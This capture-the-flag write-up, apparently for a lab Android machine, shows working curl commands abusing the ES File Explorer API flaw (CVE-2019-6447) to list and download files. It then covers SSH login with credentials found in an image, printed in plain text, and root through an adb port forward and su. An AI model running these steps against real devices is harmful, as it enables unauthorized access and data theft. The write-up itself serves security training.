Enumeration
First, we start by scanning the target machine’s open ports. As I’ve never done a pentest for an Android system, we might have to spend some extra time on the enumeration.
1
2
3
4
5
6
7
8
9
10
rustscan --ulimit 5000 10.129.66.253 -- sV -sC -oN nmap_scan
PORT STATE SERVICE REASON VERSION
2222/tcp open ssh syn-ack (protocol 2.0)
|_ SSH-2.0-SSH Server - Banana Studio
36527/tcp open unknown syn-ack
42135/tcp open http syn-ack ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open http syn-ack Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
The open ports are:
- 2222 - SSH - Banana Studio SSH server
- 36527 - Unknown Service
- 42135 - HTTP - ES File Explorer Name Response httpd
- 59777 - HTTP - Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
First let’s research what those open HTTP ports are.
Port 42135 - ES File Explorer
Rustscan/Nmap already tells us that this service might be a ES File Explorer. As I’ve basically no knowledge of Android systems, I first have to look up what this actuall is:
ES File Explorer is a file manager/explorer designed by ES Global, a subsidiary of DO Global, for Android devices. It includes features like cloud storage integration, file transfer from Android to Windows via FTP or LAN and a root browser. (https://en.wikipedia.org/wiki/ES_File_Explorer ).
ES File Explorer is one of the most used storage managers on Android devices. It works amazingly well with root and the ad-free pro version is in literal sense “Cherry on a Cake”. ES File Explorer may be amazing but as the number of users increased and the Android version progresses, the Android Vulnerability has been openly available. If the target is using an older version of the storage manager, then you can easily hack Android with File Explorer exploit. (https://www.hackeracademy.org/how-to-hack-android-with-es-file-explorer-exploit/)
ES File Explorer is a file manager application on Android, which supports functions such as skimming through and managing files. It has over 100 million installations, and is the most popular file manager application on Android. The ES file browser creates an HTTP service bound to port 59777 at runtime, which provides 10+ commands for accessing data in user’s cell phone and executing the application; however, the service does not check this request. Test, resulting in a security breach.
So, this seems to be highly interconnected with the other open HTTP Port 59777.
Port 59777 - ES File Explorer API
While I was doing some research on the used technology, I also ran a directory and file scan on the open port with Feroxbuster:
The results were 1000s of found directories, having similarities to a file system:
However, as I had no previous experience with Android file systems I didn’t know if my assumptions were correct, thus I went back to the research on ES File Server Exploits.
This blog has an awesome explanation of the ES File Explorer Security Vulnerability (CVE-2019-6447). So thanks to Knownsec 404 team.
Let’s try some of the avaialbe ES File Explorer commands to see if this machine is actually vulnerable:
1
2
└──╼ $ curl --header "Content-Type: application/json" --request POST --data '{"command":"getDeviceInfo"}' http://10.129.66.253:59777
{"name":"VMware Virtual Platform", "ftpRoot":"/sdcard", "ftpPort":"3721"}
And indeed! We get a response!
We can also try the other available commands:
The article also states that “in addition to the commands listed above, you can also directly access the url + system file path to access the file data”. So that’s why our directory scan found so many valid results!
Initial Foothold
Now that we know what the vulnerability is, we can start exploring the file system.
1) List Apps
1
2
3
4
5
6
7
8
└──╼ $ curl --header "Content-Type: application/json" --request POST --data '{"command":"listApps"}' http://10.129.66.253:59777
[
{"packageName":"com.android.vending", "label":"Google Play Store", "version":"22.4.25-21 [0] [PR] 337959405", "versionCode":"82242510", "location":"/data/app/com.android.vending-0RrcI7JypdrtQo-mFUf4dQ==/base.apk", "size":"21443369", "status":"com.google.android.finsky.setup.VendingBackupAgent", "mTime":"1615841318708"},
{"packageName":"com.google.android.gm", "label":"Gmail", "version":"2020.05.31.316831277.release", "versionCode":"62209002", "location":"/data/app/com.google.android.gm-t9fDaBNpeZ7G-CMdBL_ttg==/base.apk", "size":"27673101", "status":"com.google.android.gm.persistence.GmailBackupAgent", "mTime":"1615678323324"},
{"packageName":"com.estrongs.android.pop", "label":"ES File Explorer", "version":"4.1.9.7.3", "versionCode":"787", "location":"/data/app/com.estrongs.android.pop-MTJxvADQmhb_N0b4rDw3qg==/base.apk", "size":"17130649", "status":"null", "mTime":"1615674548084"},
{"packageName":"com.google.android.gms", "label":"Google Play services", "version":"21.02.14 (100800-352619232)", "versionCode":"210214032", "location":"/data/app/com.google.android.gms-nDaud_4X9rKUVRokD5Czdg==/base.apk", "size":"96281333", "status":"null", "mTime":"1615677711265"},
{"packageName":"net.xnano.android.sshserver", "label":"SSH Server", "version":"0.9.1", "versionCode":"91", "location":"/data/app/net.xnano.android.sshserver-ATSUYngWaQt6kIwvtkUI1A==/base.apk", "size":"6427009", "status":"null", "mTime":"1615674633368"}
]
Nothing interesting.
1) List Audios
1
2
3
└──╼ $ curl --header "Content-Type: application/json" --request POST --data '{"command":"listAudios"}' http://10.129.66.253:59777
[
]
No Audios.
3) List Files
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
curl --header "Content-Type: application/json" --request POST --data '{"command":"listFiles"}' http://10.129.66.253:59777
[
{"name":"lib", "time":"3/25/20 05:12:02 AM", "type":"folder", "size":"12.00 KB (12,288 Bytes)", },
{"name":"vndservice_contexts", "time":"8/6/21 04:50:58 AM", "type":"file", "size":"65.00 Bytes (65 Bytes)", },
{"name":"vendor_service_contexts", "time":"8/6/21 04:50:58 AM", "type":"file", "size":"0.00 Bytes (0 Bytes)", },
{"name":"vendor_seapp_contexts", "time":"8/6/21 04:50:58 AM", "type":"file", "size":"0.00 Bytes (0 Bytes)", },
{"name":"vendor_property_contexts", "time":"8/6/21 04:50:58 AM", "type":"file", "size":"392.00 Bytes (392 Bytes)", },
{"name":"vendor_hwservice_contexts", "time":"8/6/21 04:50:58 AM", "type":"file", "size":"0.00 Bytes (0 Bytes)", },
{"name":"vendor_file_contexts", "time":"8/6/21 04:50:58 AM", "type":"file", "size":"6.92 KB (7,081 Bytes)", },
{"name":"vendor", "time":"3/25/20 12:12:33 AM", "type":"folder", "size":"4.00 KB (4,096 Bytes)", },
{"name":"ueventd.rc", "time":"8/6/21 04:50:58 AM", "type":"file", "size":"5.00 KB (5,122 Bytes)", },
{"name":"ueventd.android_x86_64.rc", "time":"8/6/21 04:50:58 AM", "type":"file", "size":"464.00 Bytes (464 Bytes)", },
{"name":"system", "time":"3/25/20 12:12:31 AM", "type":"folder", "size":"4.00 KB (4,096 Bytes)", },
{"name":"sys", "time":"8/6/21 04:50:58 AM", "type":"folder", "size":"0.00 Bytes (0 Bytes)", },
...
Nothing interesting.
4) List Videos
1
2
3
└──╼ $ curl --header "Content-Type: application/json" --request POST --data '{"command":"listVideos"}' http://10.129.66.253:59777
[
]%
No Videos.
5) List Pics
1
2
3
4
5
6
7
└──╼ $ curl --header "Content-Type: application/json" --request POST --data '{"command":"listPics"}' http://10.129.66.253:59777
[
{"name":"concept.jpg", "time":"4/21/21 02:38:08 AM", "location":"/storage/emulated/0/DCIM/concept.jpg", "size":"135.33 KB (138,573 Bytes)", },
{"name":"anc.png", "time":"4/21/21 02:37:50 AM", "location":"/storage/emulated/0/DCIM/anc.png", "size":"6.24 KB (6,392 Bytes)", },
{"name":"creds.jpg", "time":"4/21/21 02:38:18 AM", "location":"/storage/emulated/0/DCIM/creds.jpg", "size":"1.14 MB (1,200,401 Bytes)", },
{"name":"224_anc.png", "time":"4/21/21 02:37:21 AM", "location":"/storage/emulated/0/DCIM/224_anc.png", "size":"124.88 KB (127,876 Bytes)", },
]%
creds.jpg sounds interesting! Let’s check it out. We can either use the getFile command or simply access it via the browser. So we access http://10.129.66.253:59777/storage/emulated/0/DCIM/creds.jpg and see the following picture:
We can probably use those credentials (Kristi:Kr1sT!5h@Rp3xPl0r3!) for the SSH login on port 2222.
1
2
3
4
5
└──╼ $ ssh kristi@10.129.66.253 -p 2222
Password authentication
Password:
:/ $ id
uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),9997(everybody),20076(u0_a76_cache),50076(all_a76) context=u:r:untrusted_app:s0:c76,c256,c512,c768
And we are in! The directory sdcard contains the file user.txt
Privilege Escalation
First I had to do some thorough research, as I’ve never done PrivEsc on Android devices. Finally I found an interesting article that described that Android systems can be debugged on Port 5555 with the help of the Android Debug Bridge. Often, those devices are being shipped from factory with Android Debug Bridge (ADB) enabled.
“For the ones not aware of what is ADB, try to think of it as the shell for Android devices, that lets anyone execute commands and install whatsoever they want, thus allowing them to take full control of the device without the need to authenticate. ADB was supposed to only work when connected to a computer via usb port, but as the security researcher Kevin Beaumont discovered the ADB is listening on tcp port 5555, thus anyone from internet can access it and take over your Phone, Tablet, TV or any other Android enabled device.” https://dev.to/exadra37/android-devices-being-shipped-with-tcp-port-5555-enabled-1ig5
Unfortunately, port 5555 is not open. Then I found another interesting article on hacktricks.xyz that described another way to access ADB:
“In case the adb port is only accessible from localhost in the android device but you have access via SSH, you can forward the port 5555 and connect via adb”:
1
2
ssh -i ssh_key username@10.10.10.10 -L 5555:127.0.0.1:5555 -p 2222
adb connect 127.0.0.1:5555
So let’s try the same approach on our machine:
1
2
3
4
5
6
7
8
9
10
$ ssh kristi@10.129.36.12 -p 2222 -L 5555:localhost:5555
$ sudo apt-get install android-tools-adb
$ adb connect localhost:5555
connected to localhost:5555
$ adb shell
x86_64:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
x86_64:/ $ su
:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:su:s0
And we are root! Now the final step is to obtain the root flag.